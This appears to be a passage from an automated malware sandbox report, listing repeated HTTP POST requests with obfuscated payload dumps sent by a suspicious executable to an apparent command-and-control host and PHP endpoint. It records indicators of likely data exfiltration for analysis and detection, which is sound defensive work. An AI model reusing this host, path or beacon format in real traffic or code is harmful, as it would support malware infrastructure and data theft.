                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:27.380755901 CET1032OUTData Raw: 5e 5f 43 5f 5c 58 5a 5c 5e 5e 54 55 56 5e 5a 51 5f 55 59 5a 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_C_\XZ\^^TUV^ZQ_UYZR[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B'<3!$1';$Z)_0=>2$&\$Y'^+[=:&G!']*7
                                        Nov 5, 2024 08:12:27.839596033 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:27.922909021 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.74981037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:28.062614918 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:28.412012100 CET1032OUTData Raw: 5e 5f 46 5f 5c 5d 5f 51 5e 5e 54 55 56 5b 5a 51 5f 53 59 5f 52 50 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_F_\]_Q^^TUV[ZQ_SY_RPR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$",_')'<^;;<)<X3?#_*>Q0*Y'438X>*&G!']*#
                                        Nov 5, 2024 08:12:28.874825954 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:28.948395014 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.74981637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:29.072567940 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:29.427622080 CET1032OUTData Raw: 5e 5e 46 59 59 5d 5f 50 5e 5e 54 55 56 5f 5a 51 5f 56 59 59 52 58 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^FYY]_P^^TUV_ZQ_VYYRXRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.0"Z%=&'2 ^/+;>0^$?'X>=&Q'<' 38$**&G!']*3
                                        Nov 5, 2024 08:12:29.889707088 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:29.962491035 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.74982237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:30.088845015 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:30.443218946 CET1032OUTData Raw: 5e 5a 43 58 59 55 5a 51 5e 5e 54 55 56 5e 5a 5d 5f 5a 59 5c 52 5f 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZCXYUZQ^^TUV^Z]_ZY\R_R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.02<Y'X0!?;8;)'', ==-05$[?%; >:&G!']*7


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.74982837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:30.762367010 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:31.115092039 CET1300OUTData Raw: 5e 5e 43 5a 5c 58 5f 52 5e 5e 54 55 56 58 5a 5f 5f 53 59 5f 52 5f 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CZ\X_R^^TUVXZ__SY_R_RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'(3%\$28[,]0Y*%8X$?4==-'6Y$'^'#>*&G!']*/
                                        Nov 5, 2024 08:12:31.573353052 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:31.665611029 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 06 24 16 3c 51 23 14 22 1f 2b 2e 28 5a 22 19 2f 5d 38 3d 34 5d 24 0d 01 0a 29 01 0f 08 23 3a 35 01 23 2d 34 5f 23 2e 2b 1e 3d 1b 2f 5a 07 10 26 03 32 32 05 54 26 07 33 07 33 33 38 04 3d 3c 15 00 22 05 0d 5b 32 3b 18 01 26 2a 05 57 2c 3a 22 0c 2d 38 23 5a 2e 0f 34 5e 32 0e 2c 54 0d 10 39 57 3d 21 23 0c 3d 02 17 5d 26 19 34 1d 34 3e 23 12 3d 3a 2c 52 3f 2d 2d 04 24 33 24 1b 21 54 26 0c 32 15 05 02 24 1f 02 52 26 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :$<Q#"+.(Z"/]8=4]$)#:5#-4_#.+=/Z&22T&3338=<"[2;&*W,:"-8#Z.4^2,T9W=!#=]&44>#=:,R?--$3$!T&2$R&%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.74982937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:31.057131052 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:31.411921978 CET1032OUTData Raw: 5b 5d 46 5d 5c 5a 5a 57 5e 5e 54 55 56 5c 5a 5f 5f 51 59 58 52 5b 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []F]\ZZW^^TUV\Z__QYXR[R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$T [3>-_3\/80X=<_$?X>[6T'<$>7_$ =&G!']*?
                                        Nov 5, 2024 08:12:31.868746996 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:31.940855980 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.74983537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:32.073221922 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:32.427608013 CET1032OUTData Raw: 5e 5e 43 59 59 5f 5f 56 5e 5e 54 55 56 5c 5a 5d 5f 52 59 51 52 58 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CYY__V^^TUV\Z]_RYQRXRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-3<'=-'#,_>5$_$<+X(-%,X$;'+;Y):&G!']*?
                                        Nov 5, 2024 08:12:32.874933004 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:32.948268890 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.74984137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:33.069449902 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:33.427602053 CET1032OUTData Raw: 5e 59 43 53 59 59 5a 56 5e 5e 54 55 56 5e 5a 5f 5f 50 59 58 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YCSYYZV^^TUV^Z__PYXR_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'!'0>:'2$_-+>;3 (.2U$,'[?^$+;\*:&G!']*7
                                        Nov 5, 2024 08:12:33.900881052 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:33.982325077 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:31 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.74985037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:34.099775076 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:34.458817005 CET1032OUTData Raw: 5b 5f 46 59 5c 5a 5a 51 5e 5e 54 55 56 5f 5a 51 5f 52 59 50 52 5e 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_FY\ZZQ^^TUV_ZQ_RYPR^RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'T ^'.2'14Z,+Y)#',?=>50<&^03$0=&G!']*3
                                        Nov 5, 2024 08:12:34.918490887 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:34.995388985 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.74985637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:35.117746115 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:35.474378109 CET1032OUTData Raw: 5b 55 43 5b 5c 58 5f 56 5e 5e 54 55 56 5c 5a 59 5f 57 59 5e 52 5d 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UC[\X_V^^TUV\ZY_WY^R]RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-318Y$=10!+/(=C<^%/<(.2T$)&=3;<+*&G!']*?
                                        Nov 5, 2024 08:12:35.919531107 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:35.998197079 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:33 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.74986237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:36.117089987 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:36.474409103 CET1032OUTData Raw: 5e 59 43 5e 59 5c 5f 52 5e 5e 54 55 56 5e 5a 50 5f 57 59 51 52 50 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YC^Y\_R^^TUV^ZP_WYQRPRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-02%=]$!<Z/8<_='38>6053?_'(=&G!']*7


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.74986437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:36.685391903 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:37.036915064 CET1300OUTData Raw: 5b 5f 43 5c 59 5c 5a 5c 5e 5e 54 55 56 5c 5a 5a 5f 57 59 58 52 5f 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_C\Y\Z\^^TUV\ZZ_WYXR_R\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-3X'-\$ [,;#?%3</>=&$53-?%;#X>:&G!']*?
                                        Nov 5, 2024 08:12:37.508275986 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:37.590838909 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5a 33 38 2b 08 23 14 25 08 2b 3e 3f 03 22 27 2f 5a 2c 3d 20 10 24 1d 09 0c 2a 3f 21 08 21 39 2a 58 35 03 0a 5e 23 10 02 0a 29 21 2f 5a 07 10 25 10 26 1c 23 52 32 3e 28 5f 24 30 3c 07 28 3c 3b 03 22 38 33 12 26 5d 35 58 24 3a 05 50 2f 2a 22 0e 2d 3b 23 5c 2f 32 20 58 26 34 2c 54 0d 10 3a 0b 3e 1f 3c 57 29 02 39 17 27 27 3c 1f 23 2e 24 07 3f 2a 05 08 3f 2e 26 5e 33 09 3c 57 22 0b 3d 54 26 28 24 11 30 31 3c 1a 32 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9Z38+#%+>?"'/Z,= $*?!!9*X5^#)!/Z%&#R2>(_$0<(<;"83&]5X$:P/*"-;#\/2 X&4,T:><W)9''<#.$?*?.&^3<W"=T&($01<2%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.74986737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:36.808707952 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:37.162015915 CET1032OUTData Raw: 5e 5e 46 5f 59 5d 5a 51 5e 5e 54 55 56 53 5a 5d 5f 5a 59 5f 52 50 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^F_Y]ZQ^^TUVSZ]_ZY_RPRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-',Z'-*'?;<^?%;'Z<>>'<\&=0'(>:&G!']*
                                        Nov 5, 2024 08:12:37.618966103 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:37.691761971 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.74987537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:37.827774048 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:38.177613020 CET1032OUTData Raw: 5e 58 43 59 59 5b 5a 56 5e 5e 54 55 56 5c 5a 5e 5f 54 59 51 52 51 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XCYY[ZV^^TUV\Z^_TYQRQR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$,0]$",(#>&<Y$#[*-6'/._&-73;$>:&G!']*?
                                        Nov 5, 2024 08:12:38.666007042 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:38.744168043 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.74988137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:38.875508070 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:39.224459887 CET1032OUTData Raw: 5b 58 43 58 5c 5e 5a 55 5e 5e 54 55 56 5f 5a 59 5f 57 59 5c 52 5b 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
